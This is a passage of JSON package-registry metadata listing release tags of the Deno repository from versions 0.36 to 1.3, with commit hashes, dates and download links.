bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.